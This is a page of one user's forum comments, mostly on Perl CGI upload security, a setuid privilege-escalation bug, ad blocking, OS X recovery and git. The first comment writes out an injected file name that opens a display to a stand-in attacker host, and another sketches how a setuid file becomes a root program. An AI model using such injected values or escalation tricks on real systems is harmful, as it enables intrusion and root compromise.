
Comment Re: Perl (Score 1) 414

Old versions of CGI could be tricked into returning something besides a file handle to $cgi->param( 'file' ). I imagine the exploit worked by using multiple "file" parameters in the request. Where the first would be a text string and second would be an uploaded file. The returns of cgi->upload and cgi->param are normally arrays but in scalar context return just the first relevant value. So $cgi->upload( 'file' ) would return a true value but $cgi->param( 'file' ) would return the text from the request as it was before the upload.

Perl has two basic forms of the open function. The 2 argument and 3 argument versions. The 3 argument version works more like the C standard system call open, but the two argument function respects piping and redirect characters. So if you got perl to take that user controlled string and treat it as a piped file name say "xterm -display attacker.example.org |" and the perl script just blindly opens that as a filename using the two argument form. ( Hint <...> uses the two argument form internally ) then you can pretty much get the script to run whatever you want. It's one of the reasons that CGI changed how upload files work in current versions, and perl handles <$var> differently than it used to. And also has the <<>> form which does the 3 argument version of open which treats names always as just filenames instead of possibly pipes etc.
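The difference between the two open forms described in the comment above, as an added example that is not part of the original comment: the same string is passed to a two-argument and a three-argument open, followed by a check that a value really is an open handle before it is read. The sample string and the helper names (slurp_two_arg, slurp_three_arg, is_open_handle) are constructed for illustration.

```perl
#!/usr/bin/env perl
use strict;
use warnings;

# Constructed stand-in for a request value the script expected to be an upload
# handle but that is really user-supplied text ending in a pipe character.
my $value = q{echo two-arg-open-ran-a-command |};

# Two-argument open: the mode is parsed out of the string itself, so a
# trailing "|" makes Perl run the text as a command and return its output.
# The plain <> operator opens each @ARGV entry with these same semantics.
sub slurp_two_arg {
    my ($name) = @_;
    open( my $fh, $name ) or return "open failed: $!\n";    ## no critic
    my $data = do { local $/; <$fh> };
    close $fh;
    return $data;
}

# Three-argument open: the mode is fixed to "<", so the string can only ever
# be a file name. No file with that name exists, so the open simply fails.
# The <<>> operator (Perl 5.22 and later) opens @ARGV entries this way.
sub slurp_three_arg {
    my ($name) = @_;
    open( my $fh, '<', $name ) or return "open failed: $!\n";
    my $data = do { local $/; <$fh> };
    close $fh;
    return $data;
}

# Guard for code that expects an upload handle: accept only a reference that
# has a real file descriptor behind it, never a plain string.
sub is_open_handle {
    my ($thing) = @_;
    return 0 if !ref $thing;
    return defined( eval { fileno $thing } ) ? 1 : 0;
}

print 'two-argument open:   ', slurp_two_arg($value);
print 'three-argument open: ', slurp_three_arg($value);
print 'string is a handle:  ', is_open_handle($value),  "\n";
print 'STDIN is a handle:   ', is_open_handle( \*STDIN ), "\n";
```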

Comment Re:Perl (Score 1) 414

CGI.pm is no longer included as part of core with the newest versions of perl and use of alternatives was highly recommended even before its removal. See CGI::Alternatives for some alternatives. Also the above code seems to use an outdated approach to get upload temporary file handles ( using CGI::param instead of CGI::upload ). It also fails to pass perlcritic at least with the settings I use.

If I was using CGI I'd probably write the above code closer to the following ( dry-coded, untested as I don't have the CGI module installed on my system. )


#!/usr/bin/env perl

use strict;
use warnings;
use CGI;
use Carp;
use English qw{ -no_match_vars };
use Readonly;

Readonly my $BLOCK_SIZE => 1024;

my $cgi = CGI->new();

my ( $handle ) = $cgi->upload( q{file} );

if ( defined $handle ) {
        my $buffer;
        while ( my $bytes = $handle->read( $buffer, $BLOCK_SIZE ) ) {
                print { \*STDOUT } $buffer
                        or croak q{I/O error: }, $ERRNO;
        }
} ## end if ( defined $handle )

1;

Actually the style of my code would be a little different as I like to "use common::sense;" instead of "use strict; use warnings;" and a few other details.

Comment Don't block most, but annoying blocked at router (Score 1) 307

In general I don't block ads; but if some site, JavaScript or the like annoys me enough I will block it at router. Currently I have some auto-play video scripts blocked, some scripts that randomly convert plain text into ad links, and for a while blocked a tracker that really slowed down the webpages. I've also blocked sites occasionally if their ads or behavior was too annoying. For example I blocked Gizmodo a while back because of that stunt they pulled with TV remotes at some tech conference. In those cases if I end up following a link for some news to a blocked site I just searched for the news and read the story elsewhere. ( Very rare that only one place will talk about something. )

I also don't have flash installed ( and turned off a couple of video codecs that mostly just got used by autoplay videos ) in my main browser which occasionally causes some sites to show a message accusing me of running an ad blocker where the flash ad would be. ( Surprised at how many sites just assume that a desktop browser must have flash or the like and don't check which codecs are installed. )

Comment Re:I still don't understand (Score 1) 130

newgrp doesn't exit it but executes a child shell which replaces the newgrp process. It's within shell that has access to file descriptor 3.

For why the file needs to have the same setuid is that is what the exploit takes advantage of, normally writing to a setuid file clears the setuid bit, but that doesn't happen if the writer is already root. Which means that using the exploit ( and some tricks to get out of append mode ) someone can turn a setuid file into any program that will run as root when it is launched.

Comment Re:See..... (Score 3, Informative) 130

You can also just boot from an OS X image, for example download the OS X installer extract the installESD.dmg file ( typing from memory but pretty sure that is the name ), install that to a USB drive and boot from it holding the option key when the computer starts up. ( again typing from memory might be command-option or the like ) In fact depending on the age of the computer it might already have a recovery partition that you can just boot directly from and then launch disk utility to mount the main partition and terminal to fix it.

Comment Re:Karma is a bitch (Score 1) 136

And what if I want to bring up two separate branches side-by-side to do some copying? Can't fucking do it in Git.

For side by side comparisons you can always just do a lightweight clone which pretty much should happen automatically if you clone to another directory within the same filesystem, i.e.
git clone -b branch orig_repo branch_repo

Submission + - LibreSSL 2.2.1 Released

An anonymous reader writes: A new version of LibreSSL (2.2.1) has been released, new version includes expanded OS support, code improvements, and bloated feature removal.

Release Notes. modern, safe programming practices. We welcome feedback and improvements from the broader community. Thanks to all of the contributors who helped make this release possible.

Comment Re:One more in a crowded field (Score 1) 337

Just like they plan on open-sourcing Facetime?

Most likely, and if something similar to the patent issue with FaceTime crops up I wouldn't be surprised on a reversed course similar to what happened with FaceTime. That said I'm assuming that the hints that they wanted to open source the language at its introduction combined with delay between then and the announcement of planning to open source meant they may have taken steps to avoid such issues this time.
